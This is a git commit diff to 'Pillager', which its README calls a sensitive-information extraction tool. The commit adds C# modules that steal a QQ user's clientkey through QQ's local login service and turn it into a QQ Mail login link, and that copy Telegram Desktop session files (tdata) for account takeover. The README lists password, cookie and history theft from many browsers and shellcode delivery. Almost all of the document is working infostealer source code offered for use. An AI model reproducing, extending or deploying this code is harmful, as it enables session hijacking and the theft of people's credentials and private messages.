update qq&tg

2023-10-07 19:09:27 +08:00 · 2023-10-07 19:09:27 +08:00 · eb3186aeb3
parent a9aa6ea21f
commit eb3186aeb3
5 changed files with 225 additions and 15 deletions
--- a/Pillager/IM/QQ.cs
+++ b/Pillager/IM/QQ.cs
@ -0,0 +1,147 @@
+using System;
+using System.Collections.Generic;
+using System.IO;
+using System.Linq;
+using System.Net;
+using System.Text;
+
+namespace Pillager.IM
+{
+    internal class QQ
+    {
+        public static string IMName = "QQ";
+
+        public static string get_pt_local_token()
+        {
+            try
+            {
+                Uri uri = new Uri(@"https://xui.ptlogin2.qq.com/cgi-bin/xlogin?proxy_url=https%3A//qzs.qq.com/qzone/v6/portal/proxy.html&daid=5&&hide_title_bar=1&low_login=0&qlogin_auto_login=1&no_verifyimg=1&link_target=blank&style=22&target=self&s_url=https%3A%2F%2Fqzs.qzone.qq.com%2Fqzone%2Fv5%2Floginsucc.html%3Fpara%3Dizone");
+
+                HttpWebRequest myRequest = (HttpWebRequest)WebRequest.Create(uri);
+                myRequest.UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0";
+                myRequest.Accept = "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8";
+                myRequest.Referer = "https://i.qq.com/";
+                HttpWebResponse response = (HttpWebResponse)myRequest.GetResponse();
+                string temp = response.Headers.Get("Set-Cookie");
+                string[] cookstr = temp.Replace(" ", "").Split(new char[] { ',', ';' });
+                string pt_local_token = "";
+                foreach (string str in cookstr)
+                {
+                    string[] cookieNameValue = str.Split('=');
+                    if (cookieNameValue[0] == "pt_local_token")
+                        pt_local_token = cookieNameValue[1];
+                }
+                return pt_local_token;
+            }
+            catch
+            {
+                return "";
+            }
+
+        }
+
+        public static string get_unis(string pt_local_token)
+        {
+            try
+            {
+                Uri uri = new Uri(@"https://localhost.ptlogin2.qq.com:4301/pt_get_uins?callback=ptui_getuins_CB&pt_local_tk=" + pt_local_token);
+                HttpWebRequest myRequest = (HttpWebRequest)WebRequest.Create(uri);
+                myRequest.UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0";
+                myRequest.Accept = "*/*";
+                myRequest.Referer = "https://xui.ptlogin2.qq.com/";
+                myRequest.CookieContainer = new CookieContainer();
+                myRequest.CookieContainer.Add(new Cookie("pt_local_token", pt_local_token, "/", ".qq.com"));
+                myRequest.CookieContainer.Add(new Cookie("_qz_referrer", "i.qq.com", "/", ".qq.com"));
+                HttpWebResponse response = (HttpWebResponse)myRequest.GetResponse();
+                Stream temp = response.GetResponseStream();
+                using (StreamReader sr = new StreamReader(temp))
+                {
+                    string content = sr.ReadToEnd();
+                    string[] cookstr = content.Replace(" ", "").Split(new char[] { ',', ':' });
+                    if (cookstr.Length > 0)
+                        return cookstr[1];
+                }
+                return "";
+            }
+            catch
+            {
+                return "";
+            }
+
+        }
+
+        public static string get_qkey(string pt_local_token, string uin)
+        {
+            try
+            {
+                HttpWebRequest request = (HttpWebRequest)WebRequest.Create(new Uri(@"https://localhost.ptlogin2.qq.com:4301/pt_get_st?clientuin=" + uin + "&r=0.1111111111111111&pt_local_tk=" + pt_local_token + "&callback=__jp0"));
+                request.CookieContainer = new CookieContainer();
+                request.CookieContainer.Add(new Cookie("pt_local_token", pt_local_token, "/", ".qq.com"));
+                request.CookieContainer.Add(new Cookie("clientuin", "uin", "/", ".qq.com"));
+                request.CookieContainer.Add(new Cookie("pt2gguin", "o" + uin + "_qz_referrer=i.qq.com", "/", ".qq.com"));
+                request.Referer = "https://xui.ptlogin2.qq.com/";
+                request.UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0";
+                request.Accept = "*/*";
+                HttpWebResponse response2 = (HttpWebResponse)request.GetResponse();
+                string temp = response2.Headers.Get("Set-Cookie");
+                string[] cookstr = temp.Replace(" ", "").Split(new char[] { ',', ';' });
+                foreach (string str in cookstr)
+                {
+                    string[] cookieNameValue = str.Split('=');
+                    if (cookieNameValue[0] == "clientkey")
+                        return cookieNameValue[1];
+                }
+                return "";
+            }
+            catch
+            {
+                return "";
+            }
+        }
+
+        public static string get_link(string clientkey, string uin)
+        {
+            try
+            {
+                HttpWebRequest request = (HttpWebRequest)WebRequest.Create(new Uri("https://ptlogin2.qq.com/jump?clientuin=" + uin + "&clientkey=" + clientkey + "&keyindex=9&u1=https%3A%2F%2Fmail.qq.com%2Fcgi-bin%2Flogin%3Fvt%3Dpassport%26vm%3Dwpt%26ft%3Dloginpage%26target%3D&pt_local_tk=&pt_3rd_aid=0&ptopt=1&style=25"));
+                request.UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0";
+                request.Accept = "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9";
+                HttpWebResponse response = (HttpWebResponse)request.GetResponse();
+                Stream temp = response.GetResponseStream();
+                using (StreamReader sr = new StreamReader(temp))
+                {
+                    string content = sr.ReadToEnd();
+                    string[] cookstr = content.Replace(" ", "").Split(new char[] { '\'' });
+                    if (cookstr.Length > 0)
+                        return cookstr[3];
+                }
+                return "";
+            }
+            catch
+            {
+                return "";
+            }
+
+        }
+
+        public static void Save(string path)
+        {
+            ServicePointManager.SecurityProtocol = (SecurityProtocolType)(768 | 3072);
+            string pt_local_token = get_pt_local_token();
+            if (pt_local_token == "") return;
+            string uin = get_unis(pt_local_token);
+            if (uin == "") return;
+            string clientkey = get_qkey(pt_local_token, uin);
+            if (clientkey == "") return;
+            string link = get_link(clientkey, uin);
+            if (link == "") return;
+
+            string savepath = Path.Combine(path, IMName);
+            Directory.CreateDirectory(savepath);
+            StringBuilder sb = new StringBuilder();
+            sb.AppendLine("QQ:"+ uin);
+            sb.AppendLine("Mail:"+ link);
+            File.WriteAllText(Path.Combine(savepath, IMName + "_ClientKey.txt"), sb.ToString());
+        }
+    }
+}
--- a/Pillager/IM/Telegram.cs
+++ b/Pillager/IM/Telegram.cs
@ -0,0 +1,51 @@
+using Pillager.Helper;
+using System;
+using System.Collections.Generic;
+using System.IO;
+using System.Linq;
+using System.Text;
+using System.Text.RegularExpressions;
+
+namespace Pillager.IM
+{
+    internal class Telegram
+    {
+        public static string IMName = "Telegram";
+
+        public static string IMPath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Telegram Desktop");
+
+        public static void Save(string path)
+        {
+            if (!Directory.Exists(IMPath)) return;
+            string savepath = Path.Combine(path, IMName);
+            Directory.CreateDirectory(savepath);
+            string[] sessionpaths =
+            {
+                "tdata\\key_datas",
+                "tdata\\D877F783D5D3EF8Cs",
+                "tdata\\D877F783D5D3EF8C\\maps",
+                "tdata\\A7FDF864FBC10B77s",
+                "tdata\\A7FDF864FBC10B77\\maps",
+                "tdata\\F8806DD0C461824Fs",
+                "tdata\\F8806DD0C461824F\\maps",
+                "tdata\\C2B05980D9127787s",
+                "tdata\\C2B05980D9127787\\maps",
+                "tdata\\0CA814316818D8F6s",
+                "tdata\\0CA814316818D8F6\\maps",
+            };
+            Directory.CreateDirectory(Path.Combine(savepath, "tdata")); 
+            Directory.CreateDirectory(savepath + "\\tdata\\D877F783D5D3EF8C");
+            Directory.CreateDirectory(savepath + "\\tdata\\A7FDF864FBC10B77");
+            Directory.CreateDirectory(savepath + "\\tdata\\F8806DD0C461824F");
+            Directory.CreateDirectory(savepath + "\\tdata\\C2B05980D9127787");
+            Directory.CreateDirectory(savepath + "\\tdata\\0CA814316818D8F6");
+            foreach (var sessionpath in sessionpaths)
+            {
+                if (File.Exists(Path.Combine(IMPath, sessionpath)))
+                {
+                    File.Copy(Path.Combine(IMPath, sessionpath), Path.Combine(savepath, sessionpath),true);
+                }
+            }
+        }
+    }
+}
--- a/Pillager/Pillager.csproj
+++ b/Pillager/Pillager.csproj
@ -55,6 +55,8 @@
    <Compile Include="Helper\Pbkdf2.cs" />
    <Compile Include="Helper\TripleDESHelper.cs" />
    <Compile Include="Helper\VaultCli.cs" />
+    <Compile Include="IM\QQ.cs" />
+    <Compile Include="IM\Telegram.cs" />
    <Compile Include="Program.cs" />
    <Compile Include="Properties\AssemblyInfo.cs" />
    <Compile Include="Helper\SQLiteHandler.cs" />
--- a/Pillager/Program.cs
+++ b/Pillager/Program.cs
@ -3,6 +3,7 @@ using System.Collections.Generic;
 using System.IO;
 using System.IO.Compression;
 using Pillager.Browsers;
+using Pillager.IM;

 namespace Pillager
 {
@ -16,6 +17,8 @@ namespace Pillager
            if (File.Exists(savezippath)) File.Delete(savezippath);
            Directory.CreateDirectory(savepath);

+            Telegram.Save(savepath);
+
            //IE
            IE.Save(savepath);

--- a/README.md
+++ b/README.md
@ -4,29 +4,36 @@

 ## 介绍

-这是一个浏览器信息提取工具，将会长期维护，如果有任何问题或建议，欢迎发issues
+这是一个敏感信息提取工具，将会长期维护，如果有任何问题或建议，欢迎发issues

-在整理工具的过程中，发现目前的浏览器信息提取工具，普遍存在各种问题，最常见的如体积过大，缺少维护，Chrome提取都有可能存在问题，于是自己在现有工具的基础上进行整理，得到了这款工具
+在整理工具的过程中，发现目前的信息提取工具，普遍存在各种问题，最常见的如体积过大，缺少维护，于是自己在现有工具的基础上进行整理，得到了这款工具

 目前支持：

-* IE
-* Edge
-* Chrome
-* Chrome Beta
-* Chromium
-* Brave-Browser
-* QQBrowser
-* SogouExplorer
-* Vivaldi
-* CocCoc
-* FireFox
+| Browser       | BookMarks | Cookies | Passwords | Historys |
+| :------------ | :-------: | :-----: | :-------: | :------: |
+| IE            |    ✅    |   ❌   |    ✅    |    ✅    |
+| Edge          |    ✅    |   ✅   |    ✅    |    ✅    |
+| Chrome        |    ✅    |   ✅   |    ✅    |    ✅    |
+| Chrome Beta   |    ✅    |   ✅   |    ✅    |    ✅    |
+| Chromium      |    ✅    |   ✅   |    ✅    |    ✅    |
+| Brave-Browser |    ✅    |   ✅   |    ✅    |    ✅    |
+| QQBrowser     |    ✅    |   ✅   |    ✅    |    ✅    |
+| SogouExplorer |    ✅    |   ✅   |    ✅    |    ✅    |
+| Vivaldi       |    ✅    |   ✅   |    ✅    |    ✅    |
+| CocCoc        |    ✅    |   ✅   |    ✅    |    ✅    |
+| FireFox       |    ✅    |   ✅   |    ✅    |    ✅    |

-后续将会陆续添加支持的浏览器
+| IM       | Support            |
+| -------- | ------------------ |
+| QQ       | ClientKey（Email） |
+| Telegram | tdata              |
+
+后续将会陆续添加支持的软件

 ## 优点

-体积小，长期维护，shellcode兼容.Net Framework 2.x/3.x/4.x , shellcode兼容x86/x64，执行后文件输出至`%Temp%\Pillager.zip`
+体积小，长期维护，shellcode兼容.Net Framework 2.x/3.x/4.x , shellcode兼容x86/x64，执行后文件输出至 `%Temp%\Pillager.zip`

 ## 编译